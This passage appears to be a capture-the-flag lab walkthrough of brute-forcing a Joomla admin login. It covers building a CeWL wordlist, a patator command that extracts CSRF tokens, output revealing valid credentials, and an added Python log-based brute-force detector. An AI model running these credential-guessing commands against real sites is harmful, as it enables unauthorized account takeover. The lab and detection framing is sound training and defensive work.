Brute Force Attack


The login page for the admin panel is available at the /joomla/administrator/index.php endpoint. Attempting a brute force attack against it.

Wordlist


The /joomla/index.php page shows a single blog post made by the super user. It contains many unusual words, which may have been used as the password.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/glasgowsmile]
└─$ cewl http://$IP/joomla/ -d 4 -m 5 --with-numbers -w wordlist.txt             
CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

Generating a wordlist with CeWL

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/glasgowsmile]
└─$ wc -l ./wordlist.txt                                                                              
90 ./wordlist.txt

90 words generated

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/glasgowsmile]
└─$ cat users.txt                                                   
admin
joomla
author
joker

I also created a list of possible usernames based on the blog post.

CSRF Token Extraction


Joomla has a built-in CSRF mitigation that places a randomly generated nonce in a hidden input field. Two hidden values from the login form must be read and sent back with every login request:

  • The first one is the value of the return parameter, which is index.php in base64 format
  • The second one is the name attribute of the token field itself, and its value is set to 1

While this can be handled easily with Burp Suite, I will use another advanced fuzzing tool, patator.

┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/glasgowsmile]
└─$ patator http_fuzz proxy=localhost:8080 url=http://$IP/joomla/administrator/index.php method=POST body="username=FILE0&passwd=FILE1&option=com_login&task=login&return=_CSRF1_&_CSRF2_=1" 0=users.txt 1=wordlist.txt follow=1 accept_cookie=1 -x ignore:fgrep='Username and password do not match or you do not have an account yet.' before_urls="http://$IP/joomla/administrator/index.php" before_egrep='_CSRF1_:type="hidden" name="return" value="(\w+)"|_CSRF2_:type="hidden" name="(\w+)" value="1"'
17:24:44 patator    INFO - Starting Patator 1.0 (https://github.com/lanjelot/patator) with python-3.13.3 at 2025-06-25 17:24 CEST
17:24:45 patator    INFO -                                                                              
17:24:45 patator    INFO - code size:clen       time | candidate                          |   num | mesg
17:24:45 patator    INFO - -----------------------------------------------------------------------------
17:24:55 patator    INFO - 200  29784:28734    0.733 | joomla:Gotham                      |   152 | HTTP/1.1 200 OK
17:25:10 patator    INFO - Hits/Done/Skip/Fail/Size: 1/360/0/0/360, Avg: 14 r/s, Time: 0h 0m 25s

Found a valid credential: joomla:Gotham
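On the defensive side, a run like the one above is loud: 360 login POSTs in 25 seconds from a single source. The following added example (my code, not from the original writeup, Joomla or patator) parses constructed Apache access-log lines and flags any source that bursts POSTs at the administrator login endpoint; the sample lines, the threshold and window, and the assumption that Joomla answers a failed login with 200 and a successful one with a 303 redirect are all mine.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-log sample (not captured from the page's lab host):
# one source hammers the Joomla administrator login, another logs in once.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Jun/2025:17:24:45 +0200] "GET /joomla/administrator/index.php HTTP/1.1" 200 5123
10.0.0.5 - - [25/Jun/2025:17:24:45 +0200] "POST /joomla/administrator/index.php HTTP/1.1" 200 28734
10.0.0.5 - - [25/Jun/2025:17:24:46 +0200] "POST /joomla/administrator/index.php HTTP/1.1" 200 28734
10.0.0.5 - - [25/Jun/2025:17:24:46 +0200] "POST /joomla/administrator/index.php HTTP/1.1" 200 28734
10.0.0.5 - - [25/Jun/2025:17:24:47 +0200] "POST /joomla/administrator/index.php HTTP/1.1" 200 28734
10.0.0.5 - - [25/Jun/2025:17:24:47 +0200] "POST /joomla/administrator/index.php HTTP/1.1" 303 0
10.0.0.9 - - [25/Jun/2025:17:24:50 +0200] "POST /joomla/administrator/index.php HTTP/1.1" 303 0
10.0.0.9 - - [25/Jun/2025:17:30:00 +0200] "GET /joomla/index.php HTTP/1.1" 200 14021
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')
LOGIN_PATH = "/joomla/administrator/index.php"

def parse(log_text):
    """Yield (ip, timestamp, method, path, status) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ip, ts, method, path, status = m.groups()
            yield ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)

def detect_bruteforce(log_text, threshold=5, window=30):
    """Flag every source IP that POSTed to the admin login at least `threshold`
    times inside any `window`-second span. Assumption: a failed Joomla login
    re-renders the form (200) and a successful one redirects (303), so a 303
    inside the burst means a guess landed and the account must be treated as
    compromised, not merely attacked."""
    posts = defaultdict(list)
    for ip, ts, method, path, status in parse(log_text):
        if method == "POST" and path == LOGIN_PATH:
            posts[ip].append((ts, status))
    alerts = {}
    for ip, events in posts.items():
        events.sort()
        for i in range(len(events)):
            burst = [e for e in events[i:] if (e[0] - events[i][0]).total_seconds() <= window]
            if len(burst) >= threshold:
                alerts[ip] = {"attempts": len(events),
                              "redirect_in_burst": any(s == 303 for _, s in burst)}
                break
    return alerts
```

Pointing it at a real access.log only requires reading the file into `detect_bruteforce`; a single legitimate login (10.0.0.9 in the sample) never trips the threshold.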

Validation


Successfully authenticated to the admin panel.